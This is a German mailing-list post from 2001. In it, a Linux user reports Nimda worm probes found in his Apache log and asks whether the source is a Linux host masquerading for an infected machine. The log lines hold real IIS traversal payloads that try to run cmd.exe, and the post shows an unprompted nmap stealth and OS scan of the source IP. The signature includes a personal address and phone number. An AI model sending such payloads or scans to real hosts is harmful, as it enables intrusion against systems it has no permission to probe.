Hallo *, Momantan geistert ja wider so ein neuer Internet-Wurm namens "nimda" durch die Netze. Alles was ich ueber diesen Wurm gelesen habe besagt aber dass es _NUR_ WinXX(XX)? Rechner angreift ... !! Jetzt habe ich mal mein Apache-Log gecheckt und folgendes entdeckt: | 217.17.225.197 - - [19/Sep/2001:16:50:17 +0200] "GET | /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-" | 217.17.225.197 - - [19/Sep/2001:16:50:19 +0200] "GET | /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" | 217.17.225.197 - - [19/Sep/2001:16:50:21 +0200] "GET | /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-" | 217.17.225.197 - - [19/Sep/2001:16:50:26 +0200] "GET | /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-" | 217.17.225.197 - - [19/Sep/2001:16:50:38 +0200] "GET | /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" | "-" | 217.17.225.197 - - [19/Sep/2001:16:50:40 +0200] "GET | /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir | HTTP/1.0" 404 324 "-" "-" | 217.17.225.197 - - [19/Sep/2001:16:50:42 +0200] "GET | /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir | HTTP/1.0" 404 324 "-" "-" | 217.17.225.197 - - [19/Sep/2001:16:50:44 +0200] "GET | /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir | HTTP/1.0" 404 340 "-" "-" | 217.17.225.197 - - [19/Sep/2001:16:50:46 +0200] "GET | /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 | "-" "-" | 217.17.225.197 - - [19/Sep/2001:16:50:51 +0200] "GET | /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 | "-" "-" | 217.17.225.197 - - [19/Sep/2001:16:50:54 +0200] "GET | /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 | "-" "-" OK, sieht nach einer nimba Atacke aus ... also mal meinen nmap drauf loslassen ... nur so auf Neugierde #8-): | thoregon:~# nmap -v -sS -sR -O 217.17.225.197 | | Starting nmap V. 2.54BETA28 ( www.insecure.org/nmap/ ) | Host (217.17.225.197) appears to be up ... good. | Initiating SYN Stealth Scan against (217.17.225.197) | Adding open port 25/tcp | Adding open port 1002/tcp | Adding open port 1723/tcp | Adding open port 80/tcp | Adding open port 135/tcp | Adding open port 443/tcp | Adding open port 139/tcp | Adding open port 2043/tcp | Adding open port 8007/tcp | Adding open port 8080/tcp | The SYN Stealth Scan took 221 seconds to scan 1548 ports. | Initiating RPCGrind Scan against (217.17.225.197) | The RPCGrind Scan took 35 seconds to scan 1548 ports. | For OSScan assuming that port 25 is open and port 1 is closed and | neither are firewalled | For OSScan assuming that port 25 is open and port 1 is closed and | neither are firewalled | For OSScan assuming that port 25 is open and port 1 is closed and | neither are firewalled | Interesting ports on (217.17.225.197): | (The 1538 ports scanned but not shown below are in state: closed) | Port State Service (RPC) | 25/tcp open smtp | 80/tcp open http | 135/tcp open loc-srv | 139/tcp open netbios-ssn | 443/tcp open https | 1002/tcp open unknown | 1723/tcp open pptp | 2043/tcp open isis-bcast | 8007/tcp open jserv | 8080/tcp open http-proxy | | No exact OS matches for host (If you know what OS is running on it, | see http://www.insecure.org/cgi-bin/nmap-submit.cgi). | | TCP/IP fingerprint: | SInfo(V=2.54BETA28%P=i586-pc-linux-gnu%D=9/19%Time=3BA8B2BC%O=25%C=1) ^^^^^^^^^^^^^^^^^ | TSeq(Class=RI%gcd=1%SI=4DB4C%TS=U) | TSeq(Class=RI%gcd=1%SI=E24DC%IPID=RD%TS=U) | TSeq(Class=RI%gcd=1%SI=72C08%TS=U) | T1(Resp=Y%DF=Y%W=2238%ACK=S++%Flags=AS%Ops=M) | T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) | T3(Resp=Y%DF=Y%W=2238%ACK=S++%Flags=AS%Ops=M) | T4(Resp=N) | T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) | T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=) | T5(Resp=N) | T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) | T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=) | PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E) | PU(Resp=N) | PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E) | | TCP Sequence Prediction: Class=random positive increments | Difficulty=470024 (Good luck!) | IPID Sequence Generation: Busy server or unknown class | | Nmap run completed -- 1 IP address (1 host up) scanned in 294 seconds Scheint ein Linux-Rechner zu sein!! Oder interpretiere ich da was falsch?? Koennte es sein dass die "nimda"-Attacke von nem Rechner stammte der hinter diesen Linux-Rechner steht und per masquerading oder proxy aggiert?? Gruss Markus -- [ markus hubig ] [ mail: mhubig@web.de ] [ debian/gnu linux 2.3 sid ] [ vorholzstraße 6 ] [ icq: 98188685 ] [ linux 2.4.9 i686 ] [ 76131 karlsruhe ] [ tele: +049 721 6657522 ] [ reg. Linux user #204961 ]
Attachment:
pgpL5MSPoToxZ.pgp
Description: PGP signature